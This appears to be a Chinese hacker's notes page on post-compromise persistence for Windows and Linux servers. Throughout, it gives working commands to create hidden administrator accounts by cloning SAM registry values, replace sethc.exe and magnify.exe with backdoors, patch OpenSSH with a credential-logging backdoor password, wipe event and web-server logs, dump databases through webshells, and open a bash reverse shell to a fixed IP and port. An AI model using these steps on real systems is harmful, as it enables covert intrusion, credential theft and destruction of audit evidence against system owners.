windows
-
用户账号后门
net user
net user a a/add
net localgroup administrators a /add
我的电脑—管理—本地用户组,在创建后的用户右击设置密码
打开注册表regedit,选择SAM,添加一个everyone权限,完全控制
找下管理员的名称,以及对应的类型名称0x1f4,
再找到管理员的二进制数值,全选复制
同样的操作,找到自己创建的用户,将管理员的二进制数值粘贴到自己创建的
最后,把设置的everyone权限删除
net user guest /active:yes
net user guest 123.com
net localgroup administrators guest /add
隐藏账号:
动support_388945a0这个用户
电脑-管理-用户-设密码support_388945a0
右击属性–拨入–允许远程访问我的电脑—管理—本地用户组,在创建后的用户 右击设置密码
打开注册表regedit,选择SAM,添加一个everyone权限,完全控制
找下管理员的名称,以及对应的类型名称0x1f4,
再找到管理员的二进制数值,名称为f的表全选复制
同样的操作,找到support_388945a0,将管理员的二进制数值粘贴到support_388945a0
最后,把设置的everyone权限删除我的电脑–属性—开启远程桌面
-
lpk后门
创建用户后
利用lpk生成一个lpk.dll文件
随后将lpk.dll文件传到目标服务器当中system32
在连接目标3389页面上,按5次shift调出黏贴键
随后再按设定好的键,输入密码,启动程序 -
木马后门
梦想时代
清痕迹—电脑–管理
事件查看器—安全性—右击清除所有事件
iis管理器—访问网站属性—日志记录属性
日志文件属性—我的电脑打开,对比删除访问记录
linux
-
后门工具
将两个工具上传后进行解压
tar zxvf openssh-5.9p 1.tar.gz
tar zxvf 0x06-openssh-5.9p 1.patch.tar.gz
cd openssh-5.9p1.path/
cp sshbd5.9p1.diff …/openssh-5.9p1
cd …/openssh-5.9p1
patch < sshbd5.9p1.diff //path 后门vi includes.h //修改后门密码,记录文件位置
/*
+#define ILOG “/tmp/ilog/” //记录登录到本机的用户名和密码
+#define OLOG “/tmp/olog” //记录本机登录到远程的用户名和密码
+#define SECRETPW “123456” //后门的密码
*/yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5//如果出现问题安装zlib
//yum install -y zlib zlib -develmake && make install
service sshd restart //重启sshd
登陆ssh
清痕迹
var/log/httpd/access_log
etc/httpd/loga/access_log
直接修改文件,将ip 访问的网站全部改掉
vim var/log/httpd/access_log
源码打包
asp 源码打包生成HSH.mdb
在木马的同一级目录下访问HSH.mdb,进行下载
在本地访问用于打包的马进行解包
php源码打包 nosafe.php马 在根目录下最下方有全选
然后选择压缩
脱裤:
数据管理—脱库马
反弹shell。
echo “bash -i >& /dev/tcp/192.168.31.237/4444 0>&1” | bash
bash -i : bash是Linux下一个常见的shell,-i参数表示产生一个交互式的shell
/dev/tcp/192.168.175.134/8080 : /dev/tcp|udp/ip/port是一个Linux中比较特殊的一个文件,如果在Linux上访问就会发现这个文件并不存在,其含义是让主机与目标主机ip在端口port建立一个tcp或udp连接
0>&1:将标准输入0输出重定向至标准输出1。或者可以这么理解,将标准输入0和标准输出1合并,在重定向至1,因为前面已经将标准输出1重定向至/dev/tcp/192.168.175.134/8080,所以现在标准输入0和标准输出1都指向/dev/tcp/192.168.175.134/8080。
echo + | bash是将中间具有交互式shell通过管道赋予bash
shift后门
将 C:\WINDOWS\system32\dllcache\sethc.exe 删除,这个文件夹中放着缓存,如果不删除就会自动变回去。
删除 C:\WINDOWS\system32\ 下的 sethc.exe 文件。
重命名 C:\WINDOWS\system32\ 下的 cmd.exe 为 sethc.exe 。
按下 5下 shift 即可弹出管理权限的 DOS 窗口。
放大镜后门
创建 magnify.bat
@echo off
net user administrator$ woaijiushi /add
net localgroup administrators hack$ /add
%Windir%\system32\nagnify.exe
exit
利用bat2com 等工具把Bat文件转换成exe文件,
将生成的 magnify.exe 分别替换掉 C:\WINDOWS\system32\dllcache 下的 magnify.exe 和C:\WINDOWS\system32\ 下的 magnify.exe
登陆时通过组合键 Win+U 调用。